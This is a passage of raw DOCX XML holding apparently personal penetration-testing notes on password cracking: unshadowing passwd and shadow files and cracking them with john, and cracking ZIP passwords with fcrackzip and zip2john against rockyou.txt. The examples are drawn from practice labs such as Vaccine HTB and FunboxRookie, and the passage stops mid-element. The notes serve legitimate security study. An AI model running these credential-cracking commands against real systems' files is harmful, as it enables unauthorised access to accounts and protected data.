        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user1.pass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and user1.shad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unshadow user1.pass user1.shad &gt; user1.unshadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output user1.unshadow is now in a format that john can crack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt user1.unshadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crack the unshadow file, which should give you a list of credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1346200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="308" name="image306.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image306.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61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1D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The orange text on the right is the username while the one on the left is password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D93">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D96">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3g7igz5r9tis" w:id="247"/>
      <w:bookmarkEnd w:id="247"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking Encrypted ZIP Files (ZIP files with passwords)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D97">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l937knob1fv2" w:id="248"/>
      <w:bookmarkEnd w:id="248"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking ZIP files using fcrackzip </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D99">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId614">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">FunboxRookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. It's a one-liner method for cracking ZIP files, unlike the zip2john method which is 2 lines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fcrackzip -u -D -v -p /usr/share/wordlists/rockyou.txt file.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: "Use unzip to test each password"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells fcrackzip to actually try to unzip the file with each password, not just check it against the hash. This can help avoid false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: "Use a dictionary attack"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells the tool to use a wordlist (dictionary) instead of brute-forcing all possible character combinations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: "Verbose output"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows progress, including which passwords are being tested. Without this, the output would be quieter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="680"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p specifies the path to the wordlist file. In this case, it's the famous rockyou.txt list, which contains millions of commonly used passwords. fcrackzip will try each line in this file as a possible password.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="406" name="image407.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image407.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId615"/>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DA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what it looks like when it works. The password here is "catwoman"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ii3ou8gbt59" w:id="249"/>
      <w:bookmarkEnd w:id="249"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking ZIP files using zip2john </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(from Vaccine HTB):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, you get a file that is protected by ZIP. You can convert those ZIP files to hashes, and then use john to crack the hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will have to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tool which is made for this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john protected.zip &gt; ziphash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">protected.zip is the zip file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ziphash.txt is the name of the file you want to save the hashes to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will provide some other meta data blob, but once you put it into john, john will know what to do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way is to get the output to terminal using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john protected.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="330200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="453" name="image441.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image441.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId616"/>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1DB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But then when you want to put it in a file like ziphash.txt, you only include the text inside of the $ sign. So here, it would be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4891088" cy="321370"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="109" name="image113.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image113.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId617"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4891088" cy="321370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, as you can see, it's much easier to just use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john protected.zip &gt; ziphash.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which will include some other blobs besides the desired string, but it will work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
